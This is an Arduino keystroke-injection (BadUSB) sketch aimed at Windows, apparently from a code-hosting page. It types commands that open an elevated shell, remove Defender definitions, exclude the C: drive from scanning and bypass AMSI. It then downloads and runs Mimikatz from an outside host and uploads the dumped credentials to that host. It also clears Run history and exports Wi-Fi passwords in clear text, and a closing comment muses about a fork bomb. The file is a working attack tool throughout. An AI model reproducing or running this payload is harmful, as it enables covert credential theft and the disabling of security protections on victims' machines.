85 lines
2.7 KiB
Text
85 lines
2.7 KiB
Text
#include <Keyboard.h>
|
|
#define KEY_DELAY 50 //delay between keystrokes for slow computers
|
|
|
|
void setup() {
|
|
// Keyboard.begin();
|
|
Keyboard.begin(KeyboardLayout_de_DE);
|
|
//I recommend that you leave a short delay before start while prototyping.
|
|
//It will will give you some time to reprogram a board before it starts typing.
|
|
delay(20000);
|
|
|
|
// normal program, only run it once at startup
|
|
|
|
// Windows + R
|
|
Keyboard.press(KEY_LEFT_GUI);
|
|
Keyboard.press('r');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(700);
|
|
|
|
// Start cmd as Administrator
|
|
Keyboard.println("powershell Start-Process cmd -Verb runAs");
|
|
delay(1500);
|
|
|
|
// press ALT + j to confirm execution as Administrator
|
|
Keyboard.press(KEY_LEFT_ALT);
|
|
Keyboard.press('j');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(1500);
|
|
|
|
// If no UAC enabled, we printed j on the console, let's
|
|
// initiate a few CTRL+C's to cancel that and get a fresh
|
|
// prompt...
|
|
Keyboard.press(KEY_LEFT_CTRL);
|
|
Keyboard.press('c');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(200);
|
|
|
|
Keyboard.press(KEY_LEFT_CTRL);
|
|
Keyboard.press('c');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(300);
|
|
|
|
// Disable Defender; wait a bit longer, because recent only `ershell ...` was printed
|
|
Keyboard.println("\"C:\\program files\\windows defender\\mpcmdrun.exe\" -RemoveDefinitions -All Set-MpPreference -DisableOAVProtection $true");
|
|
delay(200);
|
|
|
|
// Start powershell; wait longer because the OS has to bring another window to foreground
|
|
Keyboard.println("powershell");
|
|
delay(200);
|
|
|
|
// Add C: to Defender exclusion list
|
|
Keyboard.println("Add-MpPreference -ExclusionPath \"C:\\\"");
|
|
delay(200);
|
|
|
|
Keyboard.println("\"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'.'NonPublic,Static').SetValue($null,$true)\"");
|
|
delay(200);
|
|
Keyboard.println("exit");
|
|
delay(400);
|
|
|
|
// Download and execute mimikatz; then upload result log
|
|
Keyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)\"");
|
|
delay(6000);
|
|
|
|
// Clear run history
|
|
Keyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"");
|
|
delay(400);
|
|
|
|
// show wlan passwords
|
|
Keyboard.println("netsh wlan export profile key=clear");
|
|
delay(8000);
|
|
|
|
// exit cmd window
|
|
Keyboard.println("exit");
|
|
delay(KEY_DELAY);
|
|
|
|
Keyboard.end();
|
|
}
|
|
|
|
void loop() {
|
|
// do nothing in loop() -- or should we restart the computer? or lock it? or delete something?
|
|
// or start a fork bomb etc...
|
|
}
|